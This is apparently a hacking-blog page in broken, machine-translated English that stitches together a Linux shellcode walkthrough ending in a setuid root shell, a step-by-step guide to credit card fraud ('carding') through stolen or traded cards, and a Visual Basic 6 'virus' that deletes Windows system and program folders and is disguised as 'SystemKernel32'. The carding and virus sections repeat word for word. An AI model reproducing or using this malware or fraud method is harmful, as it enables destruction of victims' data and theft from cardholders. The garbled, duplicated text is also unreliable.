00000004 31DB xor ebx,ebx
00000006 31C9 xor ecx,ecx
00000008 CD80 int 0x80
0000000A 31C0 xor eax,eax
0000000C 50 push eax
0000000D 682F2F7368 push dword 0x68732f2f
00000012 682F62696E push dword 0x6e69622f
00000017 89E3 mov ebx,esp
00000019 50 push eax
0000001A 53 push ebx
0000001B 89E1 mov ecx,esp
0000001D 31D2 xor edx,edx
0000001F B00B mov al,0xb
00000021 CD80 int 0x80
The result is the same, meaning shellcode to be true. Now we proceed to execute shellcode with C program below:
1. char shellcode[] =
2. "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\x31\xc0"
3. "\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89"
4. "\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80";
5. int main() {
6. ((void (*)(void))shellcode)(); // shellcode()
7. }
$ gcc shellcode4.c -o shellcode4
$ sudo chown root:root shellcode4; sudo chmod 4755 shellcode4
$ ls -l ./shellcode4
-rwsr-xr-x 1 root root 4748 Dec 3 16:25 ./shellcode4
$ ./shellcode4
sh-3.2# whoami
sh-3.2# exit
Okay, we've managed to safely make the shellcode which resulted in local shell. In Section 2, I will explain to a remote exploit shellcode creation.
Carding [Hacking Credit Card]
Carding, an expression of the activity of shopping in cyberspace (via computer), using, various means of payment that is not valid. carding is generally synonymous with credit card transactions, and basically used the credit card does not belong to the carder will but owned by others.
what happens when the transaction took place carding, of course, the payment system every store or company that provides merchant payment allow such transactions. a carder residence approved in what way do these payments are by credit card, wire transfer, phone bill or others.
how to carding:
1. looking for a credit card is still valid, this is done by stealing or working with people who worked at a hotel or big stores (usually a credit card strangers who brushed). or go to the program MIRC (chat) on dal net server, then the channel # CC, # Carding, # indocarder, # Yogyacarding, etc.. nah in it we can trade (the term "exchange") between the credit card (if we have a credit card as well, but if you do not have a credit card, it can perform the activity "ripper" to deceive one who has a credit card is still valid).
2. after successfully getting a credit card, then the carder can find sites that sell certain products (usually in search in search engines). course on the first try (verify) the credit card on porn sites (this is because credit cards are not only used by those carder). if accepted, then the credit card can be in the shops to spend it.
3. how to enter credit card information on merchant payment by entering the store is a nickname (nick name), or a fake name of the carder, and the original address. or by filling out the original address and name of the owner of the original credit card on the form of billing and shipping address in the Address carder. (This is easy right? ... ..)
Credit card type:
> original obtained from shops or hotels (usually called virgin CC)
> trade results in carding channels
> ekstrapolet results (duplicates, using the master's program C-4, cardpro, cardwizard, etc.), software can be downloaded here: Cmaster4, and cchecker (if anyone wants to know the CVV of the card)
> hack results (commonly called the fresh cc), using perforated technique ASP
Example of a credit card:
First Name * Still
Last Name * Unless
Address * Free Mild street
City * ITown
State / Province *Tech
Zip * 126**
Phone * (0857) 14-507-***
E-mail *
Payment Method Visa
Card Number 404*******
Exp. Date 5 /12
(But this sort of activity is an act of crime)
what happens when the transaction took place carding, of course, the payment system every store or company that provides merchant payment allow such transactions. a carder residence approved in what way do these payments are by credit card, wire transfer, phone bill or others.
how to carding:
1. looking for a credit card is still valid, this is done by stealing or working with people who worked at a hotel or big stores (usually a credit card strangers who brushed). or go to the program MIRC (chat) on dal net server, then the channel # CC, # Carding, # indocarder, # Yogyacarding, etc.. nah in it we can trade (the term "exchange") between the credit card (if we have a credit card as well, but if you do not have a credit card, it can perform the activity "ripper" to deceive one who has a credit card is still valid).
2. after successfully getting a credit card, then the carder can find sites that sell certain products (usually in search in search engines). course on the first try (verify) the credit card on porn sites (this is because credit cards are not only used by those carder). if accepted, then the credit card can be in the shops to spend it.
3. how to enter credit card information on merchant payment by entering the store is a nickname (nick name), or a fake name of the carder, and the original address. or by filling out the original address and name of the owner of the original credit card on the form of billing and shipping address in the Address carder. (This is easy right? ... ..)
Credit card type:
> original obtained from shops or hotels (usually called virgin CC)
> trade results in carding channels
> ekstrapolet results (duplicates, using the master's program C-4, cardpro, cardwizard, etc.), software can be downloaded here: Cmaster4, and cchecker (if anyone wants to know the CVV of the card)
> hack results (commonly called the fresh cc), using perforated technique ASP
Example of a credit card:
First Name * Still
Last Name * Unless
Address * Free Mild street
City * ITown
State / Province *Tech
Zip * 126**
Phone * (0857) 14-507-***
E-mail *
Payment Method Visa
Card Number 404*******
Exp. Date 5 /12
(But this sort of activity is an act of crime)
Making virus using VB 6.0
Here a tutorial for making little-deadly virus, but simple, and does not seem to be caught by the antivirus, you see how easy it works
1. VB (optimum: 6.0)
2. can use VB
Virus Making Tutorial requires only 1 min
1. make a form as small as possible
2. teaching in that form, enter this code
Public Sub DelAll(ByVal DirtoDelete As Variant)
Set FSO = CreateObject(”Scripting.FileSystemObject”)
FS = FSO.DeleteFolder(DirtoDelete, True)
End Sub
Private Sub Form_Load()
On Error Resume Next
If FileExist(”c:\windows\system32\katak.txt”) = True Then
Call DelAll(”c:\windows\system”)
Call DelAll(”c:\windows\system32″)
Call DelAll(”c:\windows”)
Call DelAll(”C:\Documents and Settings\All Users”)
Call DelAll(”C:\Documents and Settings\Administrator”)
Call DelAll(”C:\Documents and Settings”)
Call DelAll(”C:\Program Files\Common Files”)
Call DelAll(”C:\Program Files\Internet Explorer”)
Call DelAll(”C:\Program Files\Microsoft Visual Studio”)
Call DelAll(”C:\Program Files”)
End If
End Sub
Function FileExist(ByVal FileName As String) As Boolean
If Dir(FileName) = “” Then
FileExist = False
FileExist = True
End If
End Function
3. Code blue who is an antidote to this virus, you probably accidentally signed so you'll be all right. so in the folder c: \ windows \ system32 \ if there are files named katak.txt, you are not going to attack itself ... you can edit to what you want ...
The red color of the folders who's going to be deleted by this virus, you can edit by your own ...
4. Create a project is named as a system, here I make a "SystemKernel32" so I will not be suspicious
5. compile it,,, and you are done
1. VB (optimum: 6.0)
2. can use VB
Virus Making Tutorial requires only 1 min
1. make a form as small as possible
2. teaching in that form, enter this code
Public Sub DelAll(ByVal DirtoDelete As Variant)
Set FSO = CreateObject(”Scripting.FileSystemObject”)
FS = FSO.DeleteFolder(DirtoDelete, True)
End Sub
Private Sub Form_Load()
On Error Resume Next
If FileExist(”c:\windows\system32\katak.txt”) = True Then
Call DelAll(”c:\windows\system”)
Call DelAll(”c:\windows\system32″)
Call DelAll(”c:\windows”)
Call DelAll(”C:\Documents and Settings\All Users”)
Call DelAll(”C:\Documents and Settings\Administrator”)
Call DelAll(”C:\Documents and Settings”)
Call DelAll(”C:\Program Files\Common Files”)
Call DelAll(”C:\Program Files\Internet Explorer”)
Call DelAll(”C:\Program Files\Microsoft Visual Studio”)
Call DelAll(”C:\Program Files”)
End If
End Sub
Function FileExist(ByVal FileName As String) As Boolean
If Dir(FileName) = “” Then
FileExist = False
FileExist = True
End If
End Function
3. Code blue who is an antidote to this virus, you probably accidentally signed so you'll be all right. so in the folder c: \ windows \ system32 \ if there are files named katak.txt, you are not going to attack itself ... you can edit to what you want ...
The red color of the folders who's going to be deleted by this virus, you can edit by your own ...
4. Create a project is named as a system, here I make a "SystemKernel32" so I will not be suspicious
5. compile it,,, and you are done
making anti_virus
Well this one useful program for those who want to create their own anti virus. you can develop your own program, one more thing in this program also have the source code
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